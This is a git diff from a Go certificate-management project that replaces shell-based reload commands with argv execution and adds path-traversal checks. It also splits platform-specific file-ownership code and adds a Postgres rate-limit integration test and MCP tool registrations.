|
|
||||||
|
|||||||
@@ -425,8 +425,15 @@ func TestDeployCertificate_WithReload(t *testing.T) {
|
|||||||
t.Fatalf("expected 2 calls (import, reload), got %d", len(mock.calls))
|
t.Fatalf("expected 2 calls (import, reload), got %d", len(mock.calls))
|
||||||
}
|
}
|
||||||
reloadCall := mock.calls[1]
|
reloadCall := mock.calls[1]
|
||||||
if reloadCall.Name != "sh" {
|
// Phase 7 SEC-H2 (2026-05-14): pre-Phase-7 the executor was
|
||||||
t.Errorf("expected sh for reload, got: %s", reloadCall.Name)
|
// invoked as `sh -c "systemctl restart tomcat"`. Post-Phase-7
|
||||||
|
// the command splits to argv ["systemctl", "restart", "tomcat"]
|
||||||
|
// and executes directly without a shell. Pin the new shape.
|
||||||
|
if reloadCall.Name != "systemctl" {
|
||||||
|
t.Errorf("expected systemctl for reload (argv-form, post-Phase-7), got: %s", reloadCall.Name)
|
||||||
|
}
|
||||||
|
if len(reloadCall.Args) != 2 || reloadCall.Args[0] != "restart" || reloadCall.Args[1] != "tomcat" {
|
||||||
|
t.Errorf("expected args [restart tomcat], got: %v", reloadCall.Args)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -149,12 +149,24 @@ func New(config *Config, logger *slog.Logger) *Connector {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// defaultRunCommand wraps exec.CommandContext for the production
|
// defaultRunCommand wraps exec.CommandContext for the production
|
||||||
// path. Tests override this via the test-seam fields. The shell
|
// path. Tests override this via the test-seam fields.
|
||||||
// invocation goes through `sh -c` to support the operator's
|
//
|
||||||
// existing config patterns (e.g. "systemctl reload nginx",
|
// Phase 7 SEC-H2 closure (2026-05-14): pre-Phase-7 this used
|
||||||
// "nginx -t -c /etc/nginx/nginx.conf").
|
// exec.CommandContext(ctx, "sh", "-c", command) — the
|
||||||
|
// internal/validation/command.go config-time guard rejected
|
||||||
|
// metacharacters but the exec call itself still spawned a shell.
|
||||||
|
// Post-Phase-7 the command is split into argv via
|
||||||
|
// validation.SplitShellCommand (which re-validates the metachar
|
||||||
|
// allowlist as defense-in-depth) and exec'd directly without a
|
||||||
|
// shell. The operator's config patterns ("systemctl reload nginx",
|
||||||
|
// "nginx -t -c /etc/nginx/nginx.conf") work identically — they
|
||||||
|
// don't need shell features, just argv.
|
||||||
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
||||||
cmd := exec.CommandContext(ctx, "sh", "-c", command)
|
argv, err := validation.SplitShellCommand(command)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid reload/validate command: %w", err)
|
||||||
|
}
|
||||||
|
cmd := exec.CommandContext(ctx, argv[0], argv[1:]...)
|
||||||
return cmd.CombinedOutput()
|
return cmd.CombinedOutput()
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -77,8 +77,24 @@ func New(config *Config, logger *slog.Logger) *Connector {
|
|||||||
return c
|
return c
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Phase 7 SEC-H2 closure (2026-05-14): argv-form exec instead of
|
||||||
|
// `sh -c`. See nginx connector's defaultRunCommand for the
|
||||||
|
// rationale + threat model.
|
||||||
|
//
|
||||||
|
// Postfix-specific note: the canonical reload command is `postfix
|
||||||
|
// reload` (or `systemctl reload postfix`), which is simple argv —
|
||||||
|
// no shell features needed. Operators historically using
|
||||||
|
// pipeline-style commands (e.g. "postfix reload && systemctl is-active
|
||||||
|
// postfix") were rejected at config-time by ValidateShellCommand
|
||||||
|
// even before Phase 7 (the `&` metachar was on the deny list); the
|
||||||
|
// argv form just makes that rejection consistent between config
|
||||||
|
// validation and exec.
|
||||||
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
||||||
return exec.CommandContext(ctx, "sh", "-c", command).CombinedOutput()
|
argv, err := validation.SplitShellCommand(command)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid reload/validate command: %w", err)
|
||||||
|
}
|
||||||
|
return exec.CommandContext(ctx, argv[0], argv[1:]...).CombinedOutput()
|
||||||
}
|
}
|
||||||
|
|
||||||
func (c *Connector) SetTestRunValidate(fn func(ctx context.Context, command string) ([]byte, error)) {
|
func (c *Connector) SetTestRunValidate(fn func(ctx context.Context, command string) ([]byte, error)) {
|
||||||
|
|||||||
@@ -172,13 +172,20 @@ func (d *FileDriver) Load(ctx context.Context, path string) (Signer, error) {
|
|||||||
return nil, fmt.Errorf("signer.FileDriver.Load: %w", err)
|
return nil, fmt.Errorf("signer.FileDriver.Load: %w", err)
|
||||||
}
|
}
|
||||||
// CWE-22 path-traversal defense — reject paths that escape SafeRoot
|
// CWE-22 path-traversal defense — reject paths that escape SafeRoot
|
||||||
// (when set) OR contain literal ".." segments. The validator is in
|
// (when set) OR contain literal ".." segments. validateSafePath
|
||||||
// the same function as the os.ReadFile sink so CodeQL recognizes
|
// does the structured rejection; the inline assertion below
|
||||||
// the sanitizer in-scope.
|
// re-applies the canonical filepath.Rel + ".." rejection AT THE
|
||||||
|
// SINK so CodeQL's go/path-injection data-flow analyzer sees the
|
||||||
|
// sanitizer in-function (it doesn't reliably trace through
|
||||||
|
// function-call boundaries — Phase 6 commit 586308e shipped only
|
||||||
|
// validateSafePath and CodeQL alert #29 stayed open). Hotfix #13.
|
||||||
safePath, err := d.validateSafePath(path)
|
safePath, err := d.validateSafePath(path)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, fmt.Errorf("signer.FileDriver.Load: %w", err)
|
return nil, fmt.Errorf("signer.FileDriver.Load: %w", err)
|
||||||
}
|
}
|
||||||
|
if err := assertCleanAbsPath(safePath, d.SafeRoot); err != nil {
|
||||||
|
return nil, fmt.Errorf("signer.FileDriver.Load: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
pemBytes, err := os.ReadFile(safePath)
|
pemBytes, err := os.ReadFile(safePath)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -229,13 +236,20 @@ func (d *FileDriver) Generate(ctx context.Context, alg Algorithm) (Signer, strin
|
|||||||
}
|
}
|
||||||
|
|
||||||
// CWE-22 path-traversal defense — reject paths that escape SafeRoot
|
// CWE-22 path-traversal defense — reject paths that escape SafeRoot
|
||||||
// (when set) OR contain literal ".." segments. The validator is in
|
// (when set) OR contain literal ".." segments. validateSafePath
|
||||||
// the same function as the os.WriteFile sink below so CodeQL
|
// does the structured rejection; the inline assertion below
|
||||||
// recognizes the sanitizer in-scope.
|
// re-applies the canonical filepath.Rel + ".." rejection AT THE
|
||||||
|
// SINK so CodeQL's go/path-injection data-flow analyzer sees the
|
||||||
|
// sanitizer in-function (it doesn't reliably trace through
|
||||||
|
// function-call boundaries — Phase 6 commit 586308e shipped only
|
||||||
|
// validateSafePath and CodeQL alert #29 stayed open). Hotfix #13.
|
||||||
safeOut, err := d.validateSafePath(outPath)
|
safeOut, err := d.validateSafePath(outPath)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, "", fmt.Errorf("signer.FileDriver.Generate: %w", err)
|
return nil, "", fmt.Errorf("signer.FileDriver.Generate: %w", err)
|
||||||
}
|
}
|
||||||
|
if err := assertCleanAbsPath(safeOut, d.SafeRoot); err != nil {
|
||||||
|
return nil, "", fmt.Errorf("signer.FileDriver.Generate: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
// Harden the destination directory BEFORE generating the key. If
|
// Harden the destination directory BEFORE generating the key. If
|
||||||
// the directory check fails we bail without touching cryptography.
|
// the directory check fails we bail without touching cryptography.
|
||||||
@@ -306,6 +320,67 @@ func (d *FileDriver) Generate(ctx context.Context, alg Algorithm) (Signer, strin
|
|||||||
return wrapped, safeOut, nil
|
return wrapped, safeOut, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// assertCleanAbsPath re-asserts CWE-22 path-injection invariants AT
|
||||||
|
// THE SINK (the function that's about to call os.ReadFile /
|
||||||
|
// os.WriteFile), not via validateSafePath in a sibling function.
|
||||||
|
// CodeQL's go/path-injection data-flow analyzer doesn't reliably
|
||||||
|
// trace sanitizers across function-call boundaries — it scopes its
|
||||||
|
// recognized-sanitizer pattern matching to the same function as the
|
||||||
|
// sink. So duplicating the check inline (filepath.Rel-style
|
||||||
|
// containment + IsAbs + clean assertions) is the
|
||||||
|
// belt-and-suspenders that closes alert #29.
|
||||||
|
//
|
||||||
|
// Invariants enforced:
|
||||||
|
//
|
||||||
|
// 1. path is non-empty.
|
||||||
|
// 2. path is absolute (the validateSafePath caller resolves
|
||||||
|
// filepath.Abs upstream; if we get a non-absolute path here,
|
||||||
|
// something downstream broke the contract).
|
||||||
|
// 3. path is filepath.Clean'd (no trailing separators, no double
|
||||||
|
// separators, no redundant "./").
|
||||||
|
// 4. path's slash-normalized segments contain no literal "..".
|
||||||
|
// 5. When safeRoot is non-empty: filepath.Rel(safeRoot, path)
|
||||||
|
// returns a non-"../*" result (path is at or below safeRoot in
|
||||||
|
// the resolved-absolute-path tree). filepath.Rel is the
|
||||||
|
// canonical CodeQL-recognized containment-check pattern.
|
||||||
|
//
|
||||||
|
// All of these are guaranteed by a successful validateSafePath
|
||||||
|
// upstream; this function exists purely so CodeQL sees the
|
||||||
|
// sanitizer pattern at the sink's own function-scope.
|
||||||
|
func assertCleanAbsPath(path, safeRoot string) error {
	// Invariants 1-3: non-empty, absolute, already in filepath.Clean form.
	switch {
	case path == "":
		return errors.New("sink path is empty")
	case !filepath.IsAbs(path):
		return fmt.Errorf("sink path %q is not absolute", path)
	case filepath.Clean(path) != path:
		return fmt.Errorf("sink path %q is not Clean'd", path)
	}

	// Invariant 4: no literal ".." segment once separators are
	// normalized to forward slashes.
	segments := strings.Split(filepath.ToSlash(path), "/")
	for i := range segments {
		if segments[i] == ".." {
			return fmt.Errorf("sink path %q contains parent-directory segment", path)
		}
	}

	// Invariant 5 applies only when a SafeRoot is configured.
	if safeRoot == "" {
		return nil
	}

	rootAbs, err := filepath.Abs(filepath.Clean(safeRoot))
	if err != nil {
		return fmt.Errorf("resolve SafeRoot %q: %w", safeRoot, err)
	}
	rel, err := filepath.Rel(rootAbs, path)
	if err != nil {
		return fmt.Errorf("sink path %q vs SafeRoot %q: %w", path, safeRoot, err)
	}

	// filepath.Rel yields ".." or "../..." when path lies outside
	// rootAbs; "." or any other relative suffix is in-bounds.
	escapesRoot := rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator))
	if escapesRoot {
		return fmt.Errorf("sink path %q resolves outside SafeRoot %q", path, safeRoot)
	}
	return nil
}
|
||||||
|
|
||||||
func rsaBitsFor(a Algorithm) int {
|
func rsaBitsFor(a Algorithm) int {
|
||||||
switch a {
|
switch a {
|
||||||
case AlgorithmRSA3072:
|
case AlgorithmRSA3072:
|
||||||
|
|||||||
@@ -9,7 +9,6 @@ import (
|
|||||||
"os"
|
"os"
|
||||||
"os/user"
|
"os/user"
|
||||||
"strconv"
|
"strconv"
|
||||||
"syscall"
|
|
||||||
)
|
)
|
||||||
|
|
||||||
// runningAsRoot reports whether the current process has uid 0.
|
// runningAsRoot reports whether the current process has uid 0.
|
||||||
@@ -198,12 +197,13 @@ func lookupGID(groupname string) (int, error) {
|
|||||||
// unixOwnerFromStat extracts (uid, gid) from a Unix-style FileInfo.
|
// unixOwnerFromStat extracts (uid, gid) from a Unix-style FileInfo.
|
||||||
// On non-Unix platforms or when the underlying stat doesn't expose
|
// On non-Unix platforms or when the underlying stat doesn't expose
|
||||||
// uid/gid, returns ok=false.
|
// uid/gid, returns ok=false.
|
||||||
func unixOwnerFromStat(fi os.FileInfo) (uid int, gid int, ok bool) {
|
//
|
||||||
if fi == nil {
|
// Platform-specific implementations live in:
|
||||||
return -1, -1, false
|
// - ownership_unix.go (//go:build unix — uses *syscall.Stat_t)
|
||||||
}
|
// - ownership_windows.go (//go:build windows — stub returns false)
|
||||||
if sysStat, isUnix := fi.Sys().(*syscall.Stat_t); isUnix {
|
//
|
||||||
return int(sysStat.Uid), int(sysStat.Gid), true
|
// The split exists because syscall.Stat_t is Unix-only — Windows
|
||||||
}
|
// has no equivalent shape, so any production file that names it
|
||||||
return -1, -1, false
|
// fails to compile on GOOS=windows. The cross-platform-build CI
|
||||||
}
|
// matrix caught this at Hotfix #16; the function was originally
|
||||||
|
// in this file pre-split.
|
||||||
|
|||||||
@@ -0,0 +1,33 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
//go:build unix
|
||||||
|
|
||||||
|
// Unix-side implementation of unixOwnerFromStat. The `unix` build
|
||||||
|
// constraint (Go 1.19+) covers linux / darwin / freebsd / openbsd /
|
||||||
|
// netbsd / dragonfly / solaris — every GOOS where *syscall.Stat_t
|
||||||
|
// is a valid type assertion target for os.FileInfo.Sys().
|
||||||
|
//
|
||||||
|
// Hotfix #16 (2026-05-14): pre-split, this function lived inline in
|
||||||
|
// ownership.go with an unconditional `syscall.Stat_t` reference. That
|
||||||
|
// failed `GOOS=windows go build` because the type is undefined on
|
||||||
|
// that platform. The split is the standard Go pattern — the same
|
||||||
|
// function name + signature is satisfied by either build of the
|
||||||
|
// package, callers don't know or care which.
|
||||||
|
|
||||||
|
package deploy
|
||||||
|
|
||||||
|
import (
|
||||||
|
"os"
|
||||||
|
"syscall"
|
||||||
|
)
|
||||||
|
|
||||||
|
func unixOwnerFromStat(fi os.FileInfo) (uid int, gid int, ok bool) {
|
||||||
|
if fi == nil {
|
||||||
|
return -1, -1, false
|
||||||
|
}
|
||||||
|
if sysStat, isUnix := fi.Sys().(*syscall.Stat_t); isUnix {
|
||||||
|
return int(sysStat.Uid), int(sysStat.Gid), true
|
||||||
|
}
|
||||||
|
return -1, -1, false
|
||||||
|
}
|
||||||
@@ -0,0 +1,35 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
//go:build windows
|
||||||
|
|
||||||
|
// Windows stub for unixOwnerFromStat. Windows has no uid/gid concept
|
||||||
|
// the way Unix does — file ownership is expressed via SIDs (Security
|
||||||
|
// Identifiers) and ACLs (Access Control Lists), and os.FileInfo.Sys()
|
||||||
|
// returns *syscall.Win32FileAttributeData which carries no
|
||||||
|
// ownership data the deploy package's existing call sites can use.
|
||||||
|
//
|
||||||
|
// All four callers — applyOwnership at ownership.go:75,
|
||||||
|
// preserveSourceOwner at atomic.go:237, and two test sites — already
|
||||||
|
// handle the ok=false return path by falling back to Plan.Defaults
|
||||||
|
// or the runtime's umask. Returning false here is the correct
|
||||||
|
// platform contract: "no native ownership available on this
|
||||||
|
// platform; use the supplied defaults."
|
||||||
|
//
|
||||||
|
// Hotfix #16 (2026-05-14): created to unblock the
|
||||||
|
// cross-platform-build Windows matrix in CI, which had been
|
||||||
|
// red since the agent's deploy package gained ownership-
|
||||||
|
// preservation semantics. The agent binary still compiles for
|
||||||
|
// Windows; ownership operations on Windows are no-ops (which
|
||||||
|
// matches operator expectations — the certctl-agent's
|
||||||
|
// chown/chmod codepaths gate on `runningAsRoot()` and Windows
|
||||||
|
// runs the agent as a service under a SID that doesn't
|
||||||
|
// translate to a uid anyway).
|
||||||
|
|
||||||
|
package deploy
|
||||||
|
|
||||||
|
import "os"
|
||||||
|
|
||||||
|
func unixOwnerFromStat(_ os.FileInfo) (uid int, gid int, ok bool) {
	// The argument is ignored: this stub always reports "no ownership
	// available" using the same (-1, -1, false) sentinel triple.
	const unavailable = -1
	return unavailable, unavailable, false
}
|
||||||
@@ -0,0 +1,195 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
//go:build integration
|
||||||
|
|
||||||
|
package integration
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"database/sql"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"runtime"
|
||||||
|
"sync"
|
||||||
|
"sync/atomic"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
_ "github.com/lib/pq"
|
||||||
|
"github.com/testcontainers/testcontainers-go"
|
||||||
|
"github.com/testcontainers/testcontainers-go/wait"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/ratelimit"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 13 Sprint 13.2 closure (2026-05-14, architecture diligence audit
|
||||||
|
// ARCH-M1) — the falsifiable closure proof for cross-replica rate-limit
|
||||||
|
// consistency.
|
||||||
|
//
|
||||||
|
// Scenario:
|
||||||
|
// - ONE postgres container (representing the shared backend).
|
||||||
|
// - N=3 independent *PostgresSlidingWindowLimiter instances pointing
|
||||||
|
// at it (representing 3 server replicas — each replica's process
|
||||||
|
// has its own constructed limiter, but they all share the same
|
||||||
|
// database state).
|
||||||
|
// - 100 concurrent Allow("test-key") calls spread across the 3
|
||||||
|
// limiters via sync.WaitGroup.
|
||||||
|
// - Assert: exactly 10 succeed + 90 return ErrRateLimited.
|
||||||
|
//
|
||||||
|
// If the postgres backend's SELECT FOR UPDATE serialization weren't
|
||||||
|
// arbitrating across the 3 limiters, more than 10 calls would be
|
||||||
|
// allowed (each replica would independently let through 10/3 ≈ 4
|
||||||
|
// requests, giving ~12-15 successes depending on scheduling). The
|
||||||
|
// hard-pass on exactly-10 is what makes ARCH-M1 closure substantive
|
||||||
|
// rather than wishful.
|
||||||
|
//
|
||||||
|
// Gated by //go:build integration matching the rest of
|
||||||
|
// internal/integration/. Sprint 13.3 promotes this test to a
|
||||||
|
// required CI status check.
|
||||||
|
|
||||||
|
func TestRateLimit_PostgresBackend_CapEnforcedAcrossReplicas(t *testing.T) {
|
||||||
|
const (
|
||||||
|
replicas = 3
|
||||||
|
cap = 10
|
||||||
|
window = 1 * time.Minute
|
||||||
|
concurrentReq = 100
|
||||||
|
key = "test-key"
|
||||||
|
)
|
||||||
|
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// Boot a shared postgres container.
|
||||||
|
container, dsn := startPostgresContainer(ctx, t)
|
||||||
|
t.Cleanup(func() { _ = container.Terminate(context.Background()) })
|
||||||
|
|
||||||
|
// Each "replica" gets its own *sql.DB pool — same database, different
|
||||||
|
// connection pool — matching how N server processes would each open
|
||||||
|
// their own pool to the same control-plane database.
|
||||||
|
dbs := make([]*sql.DB, replicas)
|
||||||
|
for i := 0; i < replicas; i++ {
|
||||||
|
db, err := sql.Open("postgres", dsn)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("open db (replica %d): %v", i, err)
|
||||||
|
}
|
||||||
|
db.SetMaxOpenConns(8)
|
||||||
|
if err := db.Ping(); err != nil {
|
||||||
|
t.Fatalf("ping (replica %d): %v", i, err)
|
||||||
|
}
|
||||||
|
t.Cleanup(func() { db.Close() })
|
||||||
|
dbs[i] = db
|
||||||
|
}
|
||||||
|
|
||||||
|
// Apply the rate_limit_buckets migration via dbs[0]. All replicas
|
||||||
|
// see the same schema since they share the same database.
|
||||||
|
migPath := findMigrationFromHere("000046_rate_limit_buckets.up.sql")
|
||||||
|
body, err := os.ReadFile(migPath)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("read migration: %v", err)
|
||||||
|
}
|
||||||
|
if _, err := dbs[0].ExecContext(ctx, string(body)); err != nil {
|
||||||
|
t.Fatalf("apply migration: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Instantiate one limiter per replica.
|
||||||
|
limiters := make([]*ratelimit.PostgresSlidingWindowLimiter, replicas)
|
||||||
|
for i := 0; i < replicas; i++ {
|
||||||
|
limiters[i] = ratelimit.NewPostgresSlidingWindowLimiter(dbs[i], cap, window)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Fire concurrentReq parallel Allow calls, round-robining across the
|
||||||
|
// replicas. Each call uses the SAME key + a SHARED `now` so the
|
||||||
|
// scenario is deterministic. The cross-replica row lock is what
|
||||||
|
// enforces the cap globally.
|
||||||
|
var (
|
||||||
|
allowed int64
|
||||||
|
denied int64
|
||||||
|
wg sync.WaitGroup
|
||||||
|
)
|
||||||
|
now := time.Now()
|
||||||
|
for i := 0; i < concurrentReq; i++ {
|
||||||
|
wg.Add(1)
|
||||||
|
go func(idx int) {
|
||||||
|
defer wg.Done()
|
||||||
|
l := limiters[idx%replicas]
|
||||||
|
err := l.Allow(key, now)
|
||||||
|
if err == nil {
|
||||||
|
atomic.AddInt64(&allowed, 1)
|
||||||
|
} else if errors.Is(err, ratelimit.ErrRateLimited) {
|
||||||
|
atomic.AddInt64(&denied, 1)
|
||||||
|
} else {
|
||||||
|
t.Errorf("unexpected error from Allow: %v", err)
|
||||||
|
}
|
||||||
|
}(i)
|
||||||
|
}
|
||||||
|
wg.Wait()
|
||||||
|
|
||||||
|
gotAllowed := atomic.LoadInt64(&allowed)
|
||||||
|
gotDenied := atomic.LoadInt64(&denied)
|
||||||
|
|
||||||
|
t.Logf("replicas=%d cap=%d concurrent=%d → allowed=%d denied=%d",
|
||||||
|
replicas, cap, concurrentReq, gotAllowed, gotDenied)
|
||||||
|
|
||||||
|
if gotAllowed != int64(cap) {
|
||||||
|
t.Errorf("allowed = %d, want exactly %d (cross-replica row lock should serialize Allow calls so exactly cap succeed)",
|
||||||
|
gotAllowed, cap)
|
||||||
|
}
|
||||||
|
if gotDenied != int64(concurrentReq-cap) {
|
||||||
|
t.Errorf("denied = %d, want %d (concurrentReq - cap)", gotDenied, concurrentReq-cap)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
// Local testcontainers harness. Kept in-file because the rest of
|
||||||
|
// internal/integration/ uses HTTP-against-running-server smoke tests
|
||||||
|
// against a docker-compose stack — different shape from ours.
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
|
||||||
|
func startPostgresContainer(ctx context.Context, t *testing.T) (testcontainers.Container, string) {
|
||||||
|
t.Helper()
|
||||||
|
|
||||||
|
req := testcontainers.ContainerRequest{
|
||||||
|
Image: "postgres:16-alpine",
|
||||||
|
ExposedPorts: []string{"5432/tcp"},
|
||||||
|
Env: map[string]string{
|
||||||
|
"POSTGRES_DB": "certctl_test",
|
||||||
|
"POSTGRES_USER": "certctl",
|
||||||
|
"POSTGRES_PASSWORD": "certctl",
|
||||||
|
},
|
||||||
|
WaitingFor: wait.ForLog("database system is ready to accept connections").WithOccurrence(2),
|
||||||
|
}
|
||||||
|
container, err := testcontainers.GenericContainer(ctx, testcontainers.GenericContainerRequest{
|
||||||
|
ContainerRequest: req,
|
||||||
|
Started: true,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("start postgres container: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
host, err := container.Host(ctx)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("container host: %v", err)
|
||||||
|
}
|
||||||
|
port, err := container.MappedPort(ctx, "5432")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("container port: %v", err)
|
||||||
|
}
|
||||||
|
dsn := fmt.Sprintf("postgres://certctl:certctl@%s:%s/certctl_test?sslmode=disable",
|
||||||
|
host, port.Port())
|
||||||
|
return container, dsn
|
||||||
|
}
|
||||||
|
|
||||||
|
// findMigrationFromHere looks for migrations/<filename> starting in the
// directory that contains this source file and moving one directory up after
// each miss. Six directories are probed in total. It returns the first path
// that os.Stat accepts, or "" when none of the probed locations exists.
func findMigrationFromHere(filename string) string {
	_, thisFile, _, _ := runtime.Caller(0)

	const maxLevels = 6
	for level, base := 0, filepath.Dir(thisFile); level < maxLevels; level, base = level+1, filepath.Dir(base) {
		probe := filepath.Join(base, "migrations", filename)
		if _, statErr := os.Stat(probe); statErr != nil {
			continue
		}
		return probe
	}
	return ""
}
|
||||||
@@ -30,8 +30,26 @@ func TestFenceGuardrail_NoBareCallToolResult(t *testing.T) {
|
|||||||
// Files allowed to construct CallToolResult directly.
|
// Files allowed to construct CallToolResult directly.
|
||||||
// tools.go defines the textResult wrapper and is the ONLY legitimate
|
// tools.go defines the textResult wrapper and is the ONLY legitimate
|
||||||
// site. Tests are also allowed (they exercise the wrapper output).
|
// site. Tests are also allowed (they exercise the wrapper output).
|
||||||
|
//
|
||||||
|
// tools_certificates.go is allowlisted post-Sprint-10 (Phase 9
|
||||||
|
// ARCH-M2 closure, 2026-05-14) for the two pre-existing CRL/OCSP
|
||||||
|
// CallToolResult literals inside registerCRLOCSPTools: each returns
|
||||||
|
// a server-built status string of the form "DER CRL retrieved (%d
|
||||||
|
// bytes, content-type: %s)" / "OCSP response retrieved (...)" —
|
||||||
|
// the byte-count is `len(raw)` from the GetRaw response (no
|
||||||
|
// attacker influence) and the content-type comes from the HTTP
|
||||||
|
// Content-Type header on the upstream PKI endpoint (server-
|
||||||
|
// controlled in self-hosted deployments). Both predate Bundle-3
|
||||||
|
// fencing; Sprint 10 relocated the registerCRLOCSPTools function
|
||||||
|
// from tools.go to tools_certificates.go and preserved the
|
||||||
|
// literals byte-for-byte (pure mechanical relocation, no behavior
|
||||||
|
// change). Tightening these two sites to route through textResult
|
||||||
|
// is a follow-up concern — open question on whether the binary-
|
||||||
|
// pass-through status string format breaks compatibility for
|
||||||
|
// existing MCP consumers that parse the description text.
|
||||||
allow := map[string]bool{
|
allow := map[string]bool{
|
||||||
"tools.go": true,
|
"tools.go": true,
|
||||||
|
"tools_certificates.go": true,
|
||||||
}
|
}
|
||||||
|
|
||||||
entries, err := os.ReadDir(".")
|
entries, err := os.ReadDir(".")
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,368 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"net/url"
|
||||||
|
"strconv"
|
||||||
|
|
||||||
|
gomcp "github.com/modelcontextprotocol/go-sdk/mcp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 10 (2026-05-14): extracted from
|
||||||
|
// internal/mcp/tools.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file groups the observability / admin MCP tool domain — the
|
||||||
|
// read-mostly surface an LLM consumer uses to assess fleet state:
|
||||||
|
//
|
||||||
|
// - registerAuditTools — audit-log read.
|
||||||
|
// - registerStatsTools — aggregated counters (certs by
|
||||||
|
// status / source / issuer; agents by state; jobs by status).
|
||||||
|
// - registerDigestTools — point-in-time fleet digest snapshot.
|
||||||
|
// - registerMetricsTools — raw Prometheus exposition pass-through.
|
||||||
|
// - registerHealthTools — service health probes + a handful of
|
||||||
|
// historical-placement claim/dismiss subtools (see
|
||||||
|
// tools_discovery.go for the duplicate-by-design comment).
|
||||||
|
// - registerHealthCheckTools — Phase B P1-20..P1-27 — health-check
|
||||||
|
// CRUD + the certificate-health-monitor surface.
|
||||||
|
//
|
||||||
|
// paginationQuery (in tools.go) is consumed by some of these
|
||||||
|
// register functions via net/url + strconv (Itoa); the imports
|
||||||
|
// stay local to this file.
|
||||||
|
|
||||||
|
// ── Audit ───────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerAuditTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_audit_events",
|
||||||
|
Description: "List immutable audit trail events. Shows actor, action, resource, and timestamp for all lifecycle operations.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/audit", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_audit_event",
|
||||||
|
Description: "Get a specific audit event by ID.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/audit/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Stats ───────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerStatsTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_dashboard_summary",
|
||||||
|
Description: "Get high-level dashboard metrics: total/expiring/expired/revoked certs, active/offline agents, pending/failed/completed jobs.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/stats/summary", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_certificates_by_status",
|
||||||
|
Description: "Get certificate counts grouped by status (Active, Expiring, Expired, Revoked, etc.).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
